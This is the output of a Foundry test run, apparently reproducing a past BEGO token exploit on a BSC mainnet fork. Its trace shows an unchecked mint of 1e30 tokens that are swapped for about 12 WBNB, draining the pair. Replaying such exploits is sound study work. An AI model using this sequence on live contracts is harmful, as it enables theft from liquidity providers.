Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.31s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.51s (3.93ms CPU time)

Ran 1 test for src/test/2022-10/BEGO_exp.sol:ContractTest
[PASS] testExploit() (gas: 168833)
Logs:
  [Start] Attacker WBNB balance before exploit: 0.000000000000000000
  [End] Attacker WBNB balance after exploit: 12.037249252714479992

Traces:
  [6544] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 22315679 [2.231e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], "WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(BEGO: [0xc342774492b54ce5F8ac662113ED702Fc1b34972], "BEGO")
    │   └─ ← [Return]
    ├─ [0] VM::label(PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "PS_ROUTER")
    │   └─ ← [Return]
    ├─ [0] VM::label(WBNB_BEGO_PAIR: [0x88503F48e437a377f1aC2892cBB3a5b09949faDd], "WBNB_BEGO_PAIR")
    │   └─ ← [Return]
    └─ ← [Stop]

  [191533] ContractTest::testExploit()
    ├─ [2534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker WBNB balance before exploit", val: 0, decimals: 18)
    ├─ [54935] BEGO::mint(1000000000000000000000000000000 [1e30], "t", ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [], [], [])
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1000000000000000000000000000000 [1e30])
    │   ├─  storage changes:
    │   │   @ 1: 0x00000000000000000000000000000000000000000005ee3e897b7cc91e7e40f0 → 0x000000000000000000000000000000000000000c9f328b0ecff06ab35e7e40f0
    │   │   @ 0x64a1bc6a62e44a1cc826b668ade70836bc0f59c281d8c2f372b753b458efa590: 0 → 1
    │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    ├─ [24687] BEGO::approve(PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x05fdfeb6d720d362d21836bf49dc3fee053b092fc8ec8957fadb64f910727cd5: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [519] BEGO::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1000000000000000000000000000000 [1e30]
    ├─ [87567] PS_ROUTER::swapExactTokensForTokensSupportingFeeOnTransferTokens(1000000000000000000000000000000 [1e30], 0, [0xc342774492b54ce5F8ac662113ED702Fc1b34972, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1666197272 [1.666e9])
    │   ├─ [11068] BEGO::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], WBNB_BEGO_PAIR: [0x88503F48e437a377f1aC2892cBB3a5b09949faDd], 1000000000000000000000000000000 [1e30])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: WBNB_BEGO_PAIR: [0x88503F48e437a377f1aC2892cBB3a5b09949faDd], value: 1000000000000000000000000000000 [1e30])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984664640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x000000000000000000000000000000000000000c9f2c9cd04674edea40000000 → 0
    │   │   │   @ 0x05fdfeb6d720d362d21836bf49dc3fee053b092fc8ec8957fadb64f910727cd5: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffff360d3632fb98b1215bfffffff
    │   │   │   @ 0x4f783fd1e2607f69676f8339f45b43b8002fa18e1e48ec6017eaa2f299ebfc66: 0x00000000000000000000000000000000000000000000498180025c0d8b5dfeb5 → 0x000000000000000000000000000000000000000c9f2ce651c67749f7cb5dfeb5
    │   │   └─ ← [Return] true
    │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [2893] WBNB_BEGO_PAIR::getReserves() [staticcall]
    │   │   └─ ← [Return] 12037253441575941372 [1.203e19], 347121607271192683478709 [3.471e23], 1666191116 [1.666e9]
    │   ├─ [519] BEGO::balanceOf(WBNB_BEGO_PAIR: [0x88503F48e437a377f1aC2892cBB3a5b09949faDd]) [staticcall]
    │   │   └─ ← [Return] 1000000347121607271192683478709 [1e30]
    │   ├─ [62327] WBNB_BEGO_PAIR::swap(12037249252714479992 [1.203e19], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [27962] WBNB::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 12037249252714479992 [1.203e19])
    │   │   │   ├─ emit Transfer(from: WBNB_BEGO_PAIR: [0x88503F48e437a377f1aC2892cBB3a5b09949faDd], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 12037249252714479992 [1.203e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000000a70ce66b54e20178
    │   │   │   │   @ 0xfb49d954fbbc61e999ef3d427de6678f34d6718f16ab69242fef259df741150f: 0x000000000000000000000000000000000000000000000000a70cea3aa07b74fc → 0x000000000000000000000000000000000000000000000000000003cf4b997384
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] WBNB::balanceOf(WBNB_BEGO_PAIR: [0x88503F48e437a377f1aC2892cBB3a5b09949faDd]) [staticcall]
    │   │   │   └─ ← [Return] 4188861461380 [4.188e12]
    │   │   ├─ [519] BEGO::balanceOf(WBNB_BEGO_PAIR: [0x88503F48e437a377f1aC2892cBB3a5b09949faDd]) [staticcall]
    │   │   │   └─ ← [Return] 1000000347121607271192683478709 [1e30]
    │   │   ├─ emit Sync(reserve0: 4188861461380 [4.188e12], reserve1: 1000000347121607271192683478709 [1e30])
    │   │   ├─ emit Swap(sender: PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 0, amount1In: 1000000000000000000000000000000 [1e30], amount0Out: 12037249252714479992 [1.203e19], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x0000000000000000000000000164997234f49e39afcfe5b8e0c8d7c914d84346 → 0x0000000000000000000000000164a406fb5781c157e6d60930c714deb5071642
    │   │   │   @ 10: 0x000000000000000000000000000000001e26826171bc70bbea5dad12f1208dea → 0x000000000000000000000000000000001e26b907a807dc5d96d2a4c7bb88efd6
    │   │   │   @ 8: 0x63500f0c00000000498180025c0d8b5dfeb5000000000000a70cea3aa07b74fc → 0x63502718000c9f2ce651c67749f7cb5dfeb5000000000000000003cf4b997384
    │   │   └─ ← [Stop]
    │   ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 12037249252714479992 [1.203e19]
    │   └─ ← [Stop]
    ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 12037249252714479992 [1.203e19]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WBNB balance after exploit", val: 12037249252714479992 [1.203e19], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 14.61s (11.50s CPU time)

Ran 2 test suites in 14.63s (16.12s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
